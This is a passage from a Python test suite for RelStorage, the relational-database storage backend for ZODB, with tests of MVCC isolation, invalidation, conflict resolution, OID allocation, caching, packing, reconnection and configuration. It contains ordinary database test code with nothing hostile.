# Running a manual GC seems to fix it. It's hard to reproduce manually because
# it seems to depend on a particular set of tests being run.
import gc
gc.collect()
gc.collect()
self._storage._adapter.schema.drop_all()
self._storage._adapter.schema.prepare()
def checkCrossConnectionInvalidation(self):
# Verify connections see updated state at txn boundaries
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['myobj'] = 'yes'
c2 = db.open()
r2 = c2.root()
self.assertNotIn('myobj', r2)
storage = c1._storage
t = transaction.Transaction()
t.description = u'invalidation test'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
self.assertNotIn('myobj', r2)
c2.sync()
self.assertIn('myobj', r2)
self.assertEqual(r2['myobj'], 'yes')
finally:
db.close()
def checkCrossConnectionIsolation(self):
# Verify MVCC isolates connections
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['alpha'] = PersistentMapping()
r1['gamma'] = PersistentMapping()
transaction.commit()
# Open a second connection but don't load root['alpha'] yet
c2 = db.open()
r2 = c2.root()
r1['alpha']['beta'] = 'yes'
storage = c1._storage
t = transaction.Transaction()
t.description = u'isolation test 1'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
# The second connection will now load root['alpha'], but due to
# MVCC, it should continue to see the old state.
self.assertIsNone(r2['alpha']._p_changed) # A ghost
self.assertFalse(r2['alpha'])
self.assertEqual(r2['alpha']._p_changed, 0)
# make root['alpha'] visible to the second connection
c2.sync()
# Now it should be in sync
self.assertIsNone(r2['alpha']._p_changed) # A ghost
self.assertTrue(r2['alpha'])
self.assertEqual(r2['alpha']._p_changed, 0)
self.assertEqual(r2['alpha']['beta'], 'yes')
# Repeat the test with root['gamma']
r1['gamma']['delta'] = 'yes'
storage = c1._storage
t = transaction.Transaction()
t.description = u'isolation test 2'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
# The second connection will now load root[3], but due to MVCC,
# it should continue to see the old state.
self.assertIsNone(r2['gamma']._p_changed) # A ghost
self.assertFalse(r2['gamma'])
self.assertEqual(r2['gamma']._p_changed, 0)
# make root[3] visible to the second connection
c2.sync()
# Now it should be in sync
self.assertIsNone(r2['gamma']._p_changed) # A ghost
self.assertTrue(r2['gamma'])
self.assertEqual(r2['gamma']._p_changed, 0)
self.assertEqual(r2['gamma']['delta'], 'yes')
finally:
db.close()
def checkResolveConflictBetweenConnections(self, clear_cache=False):
# Verify that conflict resolution works between storage instances
# bound to connections.
obj = ConflictResolution.PCounter()
obj.inc()
# Establish a polling state; dostoreNP won't.
self._storage.poll_invalidations()
oid = self._storage.new_oid()
revid1 = self._dostoreNP(oid, data=zodb_pickle(obj))
self._storage.poll_invalidations()
# These will both poll and get the state for (oid, revid1)
# cached at that location, where it will be found during conflict
# resolution.
storage1 = self._storage.new_instance()
storage1.load(oid, '')
storage2 = self._storage.new_instance()
storage2.load(oid, '')
# Remember that the cache stats are shared between instances.
# The first had to fetch it, the second can use it.
__traceback_info__ = storage1._cache.stats()
self.assertEqual(storage1._cache.stats()['hits'], 1)
storage1._cache.reset_stats()
if clear_cache:
storage1._cache.clear(load_persistent=False)
self.assertEqual(storage1._cache.stats()['hits'], 0)
obj.inc()
obj.inc()
# The effect of committing two transactions with the same
# pickle is to commit two different transactions relative to
# revid1 that add two to _value.
root_storage = self._storage
try:
def noConflict(*_args, **_kwargs):
self.fail("Should be no conflict.")
storage1.tryToResolveConflict = noConflict
self._storage = storage1
_revid2 = self._dostoreNP(oid, revid=revid1, data=zodb_pickle(obj))
# This one had no conflicts and did no cache work
self.assertEqual(storage1._cache.stats()['hits'], 0)
self.assertEqual(storage1._cache.stats()['misses'], 0)
# This will conflict; we will prefetch everything through the cache,
# or database, and not the storage's loadSerial.
def noLoadSerial(*_args, **_kwargs):
self.fail("loadSerial on the storage should never be called")
storage2.loadSerial = noLoadSerial
self._storage = storage2
_revid3 = self._dostoreNP(oid, revid=revid1, data=zodb_pickle(obj))
# We don't actually update cache stats at all, however,
# despite the prefetching.
cache_stats = storage1._cache.stats()
__traceback_info__ = cache_stats, clear_cache
self.assertEqual(cache_stats['misses'], 0)
self.assertEqual(cache_stats['hits'], 0)
data, _serialno = self._storage.load(oid, '')
inst = zodb_unpickle(data)
self.assertEqual(inst._value, 5)
finally:
storage1.close()
storage2.close()
self._storage = root_storage
def checkResolveConflictBetweenConnectionsNoCache(self):
# If we clear the cache, we can still loadSerial()
self.checkResolveConflictBetweenConnections(clear_cache=True)
def check16KObject(self):
# Store 16 * 1024 bytes in an object, then retrieve it
data = b'a 16 byte string' * 1024
oid = self._storage.new_oid()
self._dostoreNP(oid, data=data)
got, _ = self._storage.load(oid, '')
self.assertIsInstance(got, bytes)
self.assertEqual(got, data)
self.assertEqual(len(got), len(data))
def check16MObject(self):
# Store 16 * 1024 * 1024 bytes in an object, then retrieve it
data = b'a 16 byte string' * (1024 * 1024)
oid = self._storage.new_oid()
self._dostoreNP(oid, data=data)
got, _serialno = self._storage.load(oid, '')
self.assertEqual(len(got), len(data))
self.assertEqual(got, data)
def check99X1900Objects(self):
# Store 99 objects each with 1900 bytes. This is intended
# to exercise possible buffer overfilling that the batching
# code might cause.
data = b'0123456789012345678' * 100
t = TransactionMetaData()
self._storage.tpc_begin(t)
oids = []
for _ in range(99):
oid = self._storage.new_oid()
self._storage.store(oid, b'\0'*8, data, '', t)
oids.append(oid)
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
for oid in oids:
got, _serialno = self._storage.load(oid, '')
self.assertEqual(len(got), len(data))
self.assertEqual(got, data)
def checkPreventOIDOverlap(self):
# Store an object with a particular OID, then verify that
# OID is not reused.
data = b'mydata'
oid1 = b'\0' * 7 + b'\x0f'
self._dostoreNP(oid1, data=data)
oid2 = self._storage.new_oid()
oid1_int = bytes8_to_int64(oid1)
oid2_int = bytes8_to_int64(oid2)
self.assertGreater(
oid2_int, oid1_int,
'old OID %r (%d) should be less than new OID %r (%d)'
% (oid1, oid1_int, oid2, oid2_int))
def checkNoDuplicateOIDsManyThreads(self):
# Many threads in many storages can allocate OIDs with
# no duplicates or overlaps.
# https://github.com/zodb/relstorage/issues/283
from itertools import combinations
thread_count = 11
oids_per_segment = 578
segment_count = 3
total_expected_oids = oids_per_segment * segment_count
oids_by_thread = [list() for _ in range(thread_count)]
def allocate_oids(thread_storage, thread_num):
conn_pool = thread_storage._store_connection_pool
store_conn = conn_pool.borrow()
try:
allocator = thread_storage._oids
my_oids = oids_by_thread[thread_num]
for _ in range(segment_count):
my_oids.extend(
bytes8_to_int64(thread_storage.new_oid())
for _ in range(oids_per_segment)
)
# Periodically call set_min_oid, like the storage does,
# to check for interference.
with conn_pool.borrowing() as store_conn:
allocator.set_min_oid(store_conn, my_oids[-1])
store_conn.commit()
finally:
self.assertLessEqual(conn_pool.pooled_connection_count, len(threads))
thread_storage.release()
threads = [threading.Thread(target=allocate_oids,
args=(self._storage.new_instance(), i))
for i in range(thread_count)]
for t in threads:
t.start()
for t in threads:
t.join(99)
# All of them are released, so we should be down to only one instance.
self.assertEqual(1, self._storage._store_connection_pool.instance_count)
self.assertLessEqual(self._storage._store_connection_pool.pooled_connection_count, 1)
# They all have the desired length, and each one has no duplicates.
self.assertEqual(
[len(s) for s in oids_by_thread],
[total_expected_oids for _ in range(thread_count)]
)
self.assertEqual(
[len(s) for s in oids_by_thread],
[len(set(s)) for s in oids_by_thread]
)
# They are all disjoint
for a, b in combinations(oids_by_thread, 2):
__traceback_info__ = a, b
a = set(a)
b = set(b)
self.assertTrue(a.isdisjoint(b))
# They are all monotonically increasing.
for s in oids_by_thread:
self.assertEqual(
s,
sorted(s)
)
def checkUseCache(self):
# Store an object, cache it, then retrieve it from the cache
self._storage = self.make_storage(
cache_servers='x:1 y:2',
cache_module_name=fakecache.__name__,
cache_prefix='zzz',
)
fakecache.data.clear()
db = DB(self._storage)
try:
c1 = db.open()
self.assertEqual(
c1._storage._cache.cache.g.client.servers,
['x:1', 'y:2'])
r1 = c1.root()
# The root state and checkpoints should now be cached.
# A commit count *might* be cached depending on the ZODB version.
# (Checkpoints are stored in the cache for the sake of tests/monitoring,
# but aren't read.)
# self.assertIn('zzz:checkpoints', fakecache.data)
# self.assertIsNotNone(db.storage._cache.polling_state.checkpoints)
self.assertEqual(sorted(fakecache.data.keys())[-1][:10],
'zzz:state:')
r1['alpha'] = PersistentMapping()
transaction.commit()
cp_count = 1
if self.keep_history:
item_count = 2
else:
# The previous root state was automatically invalidated
# XXX: We go back and forth on that.
item_count = 2
item_count += cp_count
self.assertEqual(len(fakecache.data), item_count)
oid = r1['alpha']._p_oid
c1._storage.load(oid, '')
# Came out of the cache, nothing new
self.assertEqual(len(fakecache.data), item_count)
# make a change
r1['beta'] = 0
transaction.commit()
# Once again, history free automatically invalidated.
# XXX: Depending on my mood.
item_count += 1
self.assertEqual(len(fakecache.data), item_count)
c1._storage.load(oid, '')
# try to load an object that doesn't exist
self.assertRaises(KeyError, c1._storage.load, b'bad.oid.', '')
finally:
db.close()
def checkMultipleStores(self):
# Verify a connection can commit multiple transactions
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['alpha'] = 1
transaction.commit()
r1['alpha'] = 2
transaction.commit()
finally:
db.close()
def checkLongTransactionDescription(self):
# Don't trip over long transaction descriptions
db = DB(self._storage)
try:
c = db.open()
r = c.root()
r['key'] = 1
transaction.get().note(u'A long description. ' * 1000)
transaction.commit()
finally:
db.close()
def checkAutoReconnect(self):
# Verify auto-reconnect
db = self._closing(DB(self._storage))
c1 = db.open()
r = c1.root()
r['alpha'] = 1
transaction.commit()
c1.close()
# Going behind its back.
c1._storage._load_connection.connection.close()
c1._storage._store_connection_pool.hard_close_all_connections()
store_pool = c1._storage._store_connection_pool
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
# ZODB5 implicitly calls sync
# immediately when a connection is opened;
# fake that here for older releases.
c2 = db.open()
self.assertIs(c2, c1)
c2.sync()
r = c2.root()
self.assertEqual(r['alpha'], 1)
r['beta'] = PersistentMapping()
c2.add(r['beta']) # Calling new_oid outside of TPC
transaction.commit()
c2.close()
del c1
del c2
def checkAutoReconnectOnSync(self):
# Verify auto-reconnect.
db = self._closing(DB(self._storage))
c1 = db.open()
r = c1.root()
c1._storage._load_connection.connection.close()
c1._storage.sync(True)
# ZODB5 calls sync when a connection is opened. Our monkey
# patch on a Connection makes sure that works in earlier
# versions, but we don't have that patch on ZODB5. So test
# the storage directly. NOTE: The load connection must be open.
# to trigger the actual sync.
r = c1.root()
r['alpha'] = 1
transaction.commit()
c1.close()
c1._storage._load_connection.connection.close()
c1._storage._store_connection_pool.hard_close_all_connections()
store_pool = c1._storage._store_connection_pool
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
c2 = db.open()
self.assertIs(c2, c1)
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
r = c2.root()
self.assertEqual(r['alpha'], 1)
r['beta'] = PersistentMapping()
c2.add(r['beta'])
transaction.commit()
c2.close()
del c1
del c2
def checkCachePolling(self):
storage2 = self.make_storage(zap=False)
db = DB(self._storage)
db2 = DB(storage2)
try:
# Set up the database.
tm1 = transaction.TransactionManager()
c1 = db.open(transaction_manager=tm1)
r1 = c1.root()
r1['obj'] = obj1 = PersistentMapping({'change': 0})
tm1.commit()
# Load and change the object in an independent connection.
tm2 = transaction.TransactionManager()
c2 = db2.open(transaction_manager=tm2)
r2 = c2.root()
r2['obj']['change'] = 1
tm2.commit()
# Now c2 has delta_after0.
# self.assertEqual(len(c2._storage._cache.delta_after0), 2)
c2.close()
# Change the object in the original connection.
c1.sync()
obj1['change'] = 2
tm1.commit()
# Close the database connection to c2.
c2._storage._load_connection.drop()
self.assertFalse(c2._storage._load_connection)
# Make the database connection to c2 reopen without polling.
c2._storage.load(b'\0' * 8, '')
self.assertTrue(c2._storage._load_connection)
# Open a connection, which should be the same connection
# as c2.
c3 = db2.open(transaction_manager=tm2)
self.assertTrue(c3 is c2)
# self.assertEqual(len(c2._storage._cache.delta_after0), 2)
# Clear the caches (but not delta_after*)
c3._resetCache()
c3._storage._cache.cache.flush_all()
obj3 = c3.root()['obj']
# Should have loaded the new object.
self.assertEqual(obj3['change'], 2)
finally:
db.close()
db2.close()
def checkDoubleCommitter(self):
# Verify we can store an object that gets committed twice in
# a single transaction.
db = DB(self._storage)
try:
conn = db.open()
try:
conn.root()['dc'] = DoubleCommitter()
transaction.commit()
conn2 = db.open()
self.assertEqual(conn2.root()['dc'].new_attribute, 1)
conn2.close()
finally:
transaction.abort()
conn.close()
finally:
db.close()
def checkHistoryWithExtension(self):
# Verify the history method works with transactions that have
# extended info.
db = DB(self._storage)
try:
conn = db.open()
try:
conn.root()['pi'] = 3.14
transaction.get().setExtendedInfo("digits", 3)
transaction.commit()
history = self._storage.history(conn.root()._p_oid)
self.assertEqual(len(history), 1)
if self.keep_history:
self.assertEqual(history[0]['digits'], 3)
finally:
conn.close()
finally:
db.close()
def checkPackBatchLockNoWait(self):
# Holding the commit lock doesn't interfere with packing.
#
# TODO: But what about row locking? Let's add a test
# that begins a commit and locks some rows and then packs.
self._storage = self.make_storage(pack_batch_timeout=0)
adapter = self._storage._adapter
test_conn, test_cursor = adapter.connmanager.open_for_store()
db = self._closing(DB(self._storage))
try:
# add some data to be packed
c = self._closing(db.open())
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
del r['alpha']
transaction.commit()
# Pack, with a commit lock held
now = packtime = time.time()
while packtime <= now:
packtime = time.time()
adapter.locker.hold_commit_lock(test_cursor)
self._storage.pack(packtime, referencesf)
adapter.locker.release_commit_lock(test_cursor)
finally:
db.close()
adapter.connmanager.close(test_conn, test_cursor)
def checkPackKeepNewObjects(self):
# Packing should not remove objects created or modified after
# the pack time, even if they are unreferenced.
db = DB(self._storage)
try:
# add some data to be packed
c = db.open()
extra1 = PersistentMapping()
c.add(extra1)
extra2 = PersistentMapping()
c.add(extra2)
transaction.commit()
# Choose the pack time to be that last committed transaction.
packtime = c._storage.lastTransactionInt()
extra2.foo = 'bar'
extra3 = PersistentMapping()
c.add(extra3)
transaction.commit()
self.assertGreater(c._storage.lastTransactionInt(), packtime)
self._storage.pack(packtime, referencesf)
# extra1 should have been garbage collected
self.assertRaises(KeyError,
self._storage.load, extra1._p_oid, '')
# extra2 and extra3 should both still exist
self._storage.load(extra2._p_oid, '')
self._storage.load(extra3._p_oid, '')
finally:
db.close()
def checkPackBrokenPickle(self):
# Verify the pack stops with the right exception if it encounters
# a broken pickle.
# Under Python 2, with zodbpickle, there may be a difference depending
# on whether the accelerated implementation is in use. Also ,the pure-python
# version on PyPy can raise IndexError
from zodbpickle.pickle import UnpicklingError as pUnpickErr
unpick_errs = (pUnpickErr, IndexError)
try:
from zodbpickle.fastpickle import UnpicklingError as fUnpickErr
except ImportError:
pass
else:
unpick_errs += (fUnpickErr,)
self._dostoreNP(self._storage.new_oid(), data=b'brokenpickle')
self.assertRaises(unpick_errs, self._storage.pack,
time.time() + 10000, referencesf)
def checkBackwardTimeTravelWithoutRevertWhenStale(self):
# If revert_when_stale is false (the default), when the database
# connection is stale (such as through failover to an
# asynchronous slave that is not fully up to date), the poller
# should notice that backward time travel has occurred and
# raise a ReadConflictError.
self._storage = self.make_storage(revert_when_stale=False)
db = DB(self._storage)
try:
c = db.open()
c._storage._adapter.poller.transactions_may_go_backwards = True
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
# To simulate failover to an out of date async slave, take
# a snapshot of the database at this point, change some
# object, then restore the database to its earlier state.
d = tempfile.mkdtemp()
try:
# Snapshot the database.
fs = FileStorage(os.path.join(d, 'Data.fs'))
fs.copyTransactionsFrom(c._storage)
# Change data in it.
r['beta'] = PersistentMapping()
transaction.commit()
self.assertTrue('beta' in r)
# Revert the data.
# We must use a separate, unrelated storage object to do this,
# because our storage object is smart enough to notice that the data
# has been zapped and revert caches for all connections and
# ZODB objects when we invoke this API.
storage_2 = self.make_storage(zap=False)
storage_2.zap_all(reset_oid=False, slow=True)
storage_2.copyTransactionsFrom(fs)
storage_2.close()
del storage_2
fs.close()
del fs
finally:
shutil.rmtree(d)
# Sync, which will call poll_invalidations().
c.sync()
# Try to load an object, which should cause ReadConflictError.
r._p_deactivate()
with self.assertRaises(ReadConflictError):
r.__getitem__('beta')
finally:
db.close()
def checkBackwardTimeTravelWithRevertWhenStale(self):
# If revert_when_stale is true, when the database
# connection is stale (such as through failover to an
# asynchronous slave that is not fully up to date), the poller
# should notice that backward time travel has occurred and
# invalidate all objects that have changed in the interval.
self._storage = self.make_storage(revert_when_stale=True)
db = DB(self._storage)
try:
transaction.begin()
c = db.open()
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
# To simulate failover to an out of date async slave, take
# a snapshot of the database at this point, change some
# object, then restore the database to its earlier state.
d = tempfile.mkdtemp()
try:
transaction.begin()
fs = FileStorage(os.path.join(d, 'Data.fs'))
fs.copyTransactionsFrom(c._storage)
r['beta'] = PersistentMapping()
transaction.commit()
self.assertTrue('beta' in r)
c._storage.zap_all(reset_oid=False, slow=True)
c._storage.copyTransactionsFrom(fs)
fs.close()
finally:
shutil.rmtree(d)
# r should still be in the cache.
self.assertTrue('beta' in r)
# Now sync, which will call poll_invalidations().
c.sync()
# r should have been invalidated
self.assertEqual(r._p_changed, None)
# r should be reverted to its earlier state.
self.assertFalse('beta' in r)
finally:
db.close()
@util.skipOnAppveyor("Random failures")
# https://ci.appveyor.com/project/jamadden/relstorage/build/1.0.75/job/32uu4xdp5mubqma8
def checkBTreesLengthStress(self):
# BTrees.Length objects are unusual Persistent objects: they
# have a conflict resolution algorithm that cannot fail, so if
# we do get a failure it's due to a problem with us.
# Unfortunately, tryResolveConflict hides all underlying exceptions
# so we have to enable logging to see them.
from relstorage.adapters.interfaces import UnableToAcquireLockError
from ZODB.ConflictResolution import logger as CRLogger
from BTrees.Length import Length
import BTrees
from six import reraise
def log_err(*args, **kwargs): # pylint:disable=unused-argument
import sys
reraise(*sys.exc_info())
CRLogger.debug = log_err
CRLogger.exception = log_err
updates_per_thread = 50
thread_count = 4
lock_errors = []
self.maxDiff = None
db = DB(self._storage)
try:
c = db.open()
try:
root = c.root()
root['length'] = Length()
# XXX: Eww! On MySQL, if we try to take a shared lock on
# OID 0, and a write lock on OID 1, we fail with a deadlock
# error. It seems that taking the shared lock on 0 also takes a shared
# lock on 1 --- somehow. Because they're adjacent to each other?
# I don't know. We have to add some space between them to be sure
# that doesn't happen. On MySQL 5.7, just 10 extra items was enough.
# On MySQL 8, we had to add more.
for i in range(50):
root[i] = BTrees.OOBTree.BTree() # pylint:disable=no-member
transaction.commit()
except:
transaction.abort()
raise
finally:
c.close()
def updater():
for _ in range(updates_per_thread):
thread_c = db.open()
__traceback_info__ = thread_c._storage
try:
# Perform readCurrent on an object not being modified.
# This adds stress to databases that use separate types of locking
# for modified and current objects. It was used to discover
# bugs in gevent+MySQL and plain MySQLdb against both 5.7 and 8.
root = thread_c.root()
root._p_activate() # unghost; only non-ghosts can readCurrent
root._p_jar.readCurrent(root)
root['length'].change(1)
time.sleep(random.random() * 0.05)
try:
transaction.commit()
except UnableToAcquireLockError as e:
lock_errors.append((type(e), str(e)))
transaction.abort()
raise
finally:
thread_c.close()
threads = []
for _ in range(thread_count):
t = threading.Thread(target=updater)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join(120)
self.assertEqual(lock_errors, [])
c = db.open()
try:
self.assertEqual(c.root()['length'](),
updates_per_thread * thread_count)
finally:
transaction.abort()
c.close()
finally:
db.close()
del CRLogger.debug
del CRLogger.exception
def checkAfterCompletion(self):
# The after completion method, which can only be called
# outside of 2-phase commit is otherise equivalent to calling
# tpc_abort.
from ZODB.interfaces import IMVCCAfterCompletionStorage
self._storage = self.make_storage(revert_when_stale=False)
with mock.patch.object(self._storage._load_connection,
'rollback_quietly') as rb:
self._storage.afterCompletion()
rb.assert_called_with()
self.assertTrue(
# pylint:disable=no-value-for-parameter
IMVCCAfterCompletionStorage.providedBy(self._storage))
def checkConfigureViaZConfig(self):
replica_fn = None
replica_conf = ''
if util.DEFAULT_DATABASE_SERVER_HOST == util.STANDARD_DATABASE_SERVER_HOST:
replica_fn = self.get_adapter_zconfig_replica_conf()
if replica_fn:
replica_conf = 'replica-conf ' + self.get_adapter_zconfig_replica_conf()
conf = u"""
%import relstorage
<zodb main>
<relstorage>
name xyz
read-only false
keep-history {KEEP_HISTORY}
{REPLICA_CONF}
blob-dir .
blob-cache-size-check-external true
blob-cache-size 100MB
blob-chunk-size 10MB
cache-local-dir-read-count 12
cache-local-dir-write-max-size 10MB
{ADAPTER}
</relstorage>
</zodb>
""".format(
KEEP_HISTORY='true' if self.keep_history else 'false',
REPLICA_CONF=replica_conf,
ADAPTER=self.get_adapter_zconfig()
)
__traceback_info__ = conf
schema_xml = u"""
<schema>
<import package="ZODB"/>
<section type="ZODB.database" name="main" attribute="database"/>
</schema>
"""
import ZConfig
from io import StringIO
from ZODB.interfaces import IBlobStorageRestoreable
from relstorage.adapters.interfaces import IRelStorageAdapter
from relstorage.blobhelper.interfaces import ICachedBlobHelper
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
schema = ZConfig.loadSchemaFile(StringIO(schema_xml))
config, _ = ZConfig.loadConfigFile(schema, StringIO(conf))
db = config.database.open()
try:
storage = db.storage
assert_that(storage, validly_provides(IBlobStorageRestoreable))
self.assertEqual(storage.isReadOnly(), False)
self.assertEqual(storage.getName(), "xyz")
assert_that(storage.blobhelper, validly_provides(ICachedBlobHelper))
self.assertIn('_External', str(storage.blobhelper.cache_checker))
adapter = storage._adapter
self.assertIsInstance(adapter, self.get_adapter_class())
assert_that(adapter, validly_provides(IRelStorageAdapter))
self.verify_adapter_from_zconfig(adapter)
self.assertEqual(adapter.keep_history, self.keep_history)
if replica_fn:
self.assertEqual(
adapter.connmanager.replica_selector.replica_conf,
replica_fn)
self.assertEqual(storage._options.blob_chunk_size, 10485760)
finally:
db.close()
def checkGeventSwitchesOnOpen(self):
# We make some queries when we open; if the driver is gevent
# capable, that should switch.
driver = self._storage._adapter.driver
if not driver.gevent_cooperative():
raise unittest.SkipTest("Driver %s not gevent capable" % (driver,))
from gevent.util import assert_switches
with assert_switches():
self.open()
#####
# Prefetch Tests
#####
def checkPrefetch(self):
db = DB(self._storage)
conn = db.open()
mapping = conn.root()['key'] = PersistentMapping()
transaction.commit()
item_count = 3
# The new state for the root invalidated the old state,
# and since there is no other connection that might be using it,
# we drop it from the cache.
item_count = 2
self.assertEqual(item_count, len(self._storage._cache))
tid = bytes8_to_int64(mapping._p_serial)
d = self._storage._cache.local_client._cache
self.assertEqual(d[0].max_tid, tid)
self.assertEqual(d[1].max_tid, tid)
self._storage._cache.clear()
self.assertEmpty(self._storage._cache)
conn.prefetch(z64, mapping)
self.assertEqual(2, len(self._storage._cache))
# second time is a no-op
conn.prefetch(z64, mapping)
self.assertEqual(2, len(self._storage._cache))
######
# Parallel Commit Tests
######
@skipIfNoConcurrentWriters
def checkCanVoteAndCommitWhileOtherStorageVotes(self):
storage1 = self._closing(self._storage.new_instance())
storage2 = self._closing(self._storage.new_instance())
# Bring them both into tpc_vote phase. Before parallel commit,
# this would have blocked as the first storage took the commit lock
# in tpc_vote.
txs = {}
for storage in (storage1, storage2):
data = zodb_pickle(MinPO(str(storage)))
t = TransactionMetaData()
txs[storage] = t
storage.tpc_begin(t)
oid = storage.new_oid()
storage.store(oid, None, data, '', t)
storage.tpc_vote(t)
# The order we choose to finish is the order of the returned
# tids.
tid1 = storage2.tpc_finish(txs[storage2])
tid2 = storage1.tpc_finish(txs[storage1])
self.assertGreater(tid2, tid1)
storage1.close()
storage2.close()
def checkCanLoadObjectStateWhileBeingModified(self):
# Get us an object in the database
storage1 = self._closing(self._storage.new_instance())
data = zodb_pickle(MinPO(str(storage1)))
t = TransactionMetaData()
storage1.tpc_begin(t)
oid = storage1.new_oid()
storage1.store(oid, None, data, '', t)
storage1.tpc_vote(t)
initial_tid = storage1.tpc_finish(t)
storage1.release()
del storage1
self._storage._cache.clear(load_persistent=False)
storage1 = self._closing(self._storage.new_instance())
# Get a completely independent storage, not sharing a cache
storage2 = self._closing(self.make_storage(zap=False))
# First storage attempts to modify the oid.
t = TransactionMetaData()
storage1.tpc_begin(t)
storage1.store(oid, initial_tid, data, '', t)
# And locks the row.
storage1.tpc_vote(t)
# storage2 would like to read the old row.
loaded_data, loaded_tid = storage2.load(oid)
self.assertEqual(loaded_data, data)
self.assertEqual(loaded_tid, initial_tid)
# Commit can now happen.
tid2 = storage1.tpc_finish(t)
self.assertGreater(tid2, initial_tid)
storage1.close()
storage2.close()
###
# IStorageCurrentRecordIteration tests
###
def check_record_iternext_basic(self, start_oid_int=None):
# Based on code from FileStorage tests
db = DB(self._storage)
conn = db.open()
conn.root()['abc'] = MinPO('abc')
conn.root()['xyz'] = MinPO('xyz')
transaction.commit()
# Now, add some additional revisions. This proves that we iterate latest reconds,
# not all transactions.
conn.root()['abc'].value = 'def'
conn.root()['xyz'].value = 'ghi'
transaction.commit()
conn.close()
storage2 = self._closing(self._storage.new_instance())
# The special case: convert to byte OID
token = None if start_oid_int is None else int64_to_8bytes(start_oid_int)
# (0, 1, 2) by default, or, e.g, (1, 2)
expected_oids = range(start_oid_int or 0, 3)
if not expected_oids:
assert start_oid_int > 3
# Call at least once.
expected_oids = (0,)
record_count = 0
for x in expected_oids:
oid, tid, data, next_token = self._storage.record_iternext(token)
record_count += 1
self.assertEqual(oid, int64_to_8bytes(x))
token = next_token
expected_data, expected_tid = storage2.load(oid)
self.assertEqual(expected_data, data)
self.assertEqual(expected_tid, tid)
if x == 2:
check_token = self.assertIsNone
else:
check_token = self.assertIsNotNone
check_token(token)
self.assertEqual(len(expected_oids), record_count)
def check_record_iternext_token_0(self):
# Passing a starting token.
self.check_record_iternext_basic(0)
def check_record_iternext_token_1(self):
# Gets a subset.
self.check_record_iternext_basic(1)
def check_record_iternext_too_large_oid(self):
with self.assertRaises(StopIteration):
self.check_record_iternext_basic(10)
class AbstractRSZodbConvertTests(StorageCreatingMixin,
ZlibWrappedFSZODBConvertTests,
# This one isn't cooperative in
# setUp(), so it needs to be last.
ZODB.tests.util.TestCase):
keep_history = True
filestorage_name = 'source'
relstorage_name = 'destination'
def setUp(self):
super(AbstractRSZodbConvertTests, self).setUp()
# Zap the storage
self.make_storage(zap=True).close()
def make_storage(self, zap=True): # pylint:disable=arguments-differ
if self.relstorage_name == 'source':
meth = self._create_src_storage
else:
meth = self._create_dest_storage
storage = meth()
if zap:
storage.zap_all(slow=self.zap_slow)
return storage
def _cfg_header(self):
return '%import relstorage\n' + super(AbstractRSZodbConvertTests, self)._cfg_header()
def _cfg_relstorage(self, name, _path, blob_dir):
cfg = dedent("""
<relstorage>
%(rs_config)s
keep-history %(rs_keep_history)s
blob-dir %(rs_blobs)s
cache-prefix %(rs_name)s
cache-local-dir %(rs_cache_path)s
</relstorage>
""" % {
'rs_name': name,
'rs_keep_history': 'true' if self.keep_history else 'false',
'rs_blobs': blob_dir,
'rs_config': self.get_adapter_zconfig(),
'rs_cache_path': os.path.abspath('.'),
})
return cfg
def _cfg_one(self, name, path, blob_dir):
if name == self.filestorage_name:
meth = self._cfg_filestorage
else:
assert name == self.relstorage_name
meth = self._cfg_relstorage
return meth(name, path, blob_dir)
def test_new_instance_still_zlib(self):
storage = self._closing(self.make_storage())
new_storage = self._closing(storage.new_instance())
self.assertIsInstance(new_storage,
ZlibStorage)
self.assertIn('_crs_untransform_record_data', storage.base.__dict__)
self.assertIn('_crs_transform_record_data', storage.base.__dict__)
self.assertIn('_crs_untransform_record_data', new_storage.base.__dict__)
self.assertIn('_crs_transform_record_data', new_storage.base.__dict__)
self.assertEqual(new_storage.copyTransactionsFrom,
new_storage.base.copyTransactionsFrom)
class AbstractRSDestHPZodbConvertTests(AbstractRSZodbConvertTests):
keep_history = True
zap_supported_by_dest = True
dest_db_needs_closed_before_zodbconvert = False
class AbstractRSDestHFZodbConvertTests(AbstractRSZodbConvertTests):
keep_history = False
zap_supported_by_dest = True
dest_db_needs_closed_before_zodbconvert = False
class AbstractRSSrcZodbConvertTests(AbstractRSZodbConvertTests):
src_db_needs_closed_before_zodbconvert = False
filestorage_name = 'destination'
relstorage_name = 'source'
class AbstractIDBOptionsTest(unittest.TestCase):
db_options = None
def test_db_options_compliance(self):
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
from relstorage.adapters.interfaces import IDBDriverOptions
from relstorage.adapters.interfaces import IDBDriverFactory
__traceback_info__ = self.db_options
assert_that(self.db_options, validly_provides(IDBDriverOptions))
for factory in self.db_options.known_driver_factories():
assert_that(factory, validly_provides(IDBDriverFactory))
class AbstractIDBDriverTest(unittest.TestCase):
driver = None
def test_db_driver_compliance(self):
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
from relstorage.adapters.interfaces import IDBDriver
__traceback_info__ = self.driver
assert_that(self.driver, validly_provides(IDBDriver))
class DoubleCommitter(Persistent):
"""A crazy persistent class that changes self in __getstate__"""
def __getstate__(self):
if not hasattr(self, 'new_attribute'):
self.new_attribute = 1 # pylint:disable=attribute-defined-outside-init
return Persistent.__getstate__(self)
def _close_and_clean_storage(storage):
try:
storage.close()
storage.cleanup()
except Exception: # pylint:disable=broad-except
pass
class AbstractToFileStorage(RelStorageTestBase):
# Subclass this and set:
# - keep_history = True; and
# - A base class of UndoableRecoveryStorage
#
# or
# - keep_history = False; and
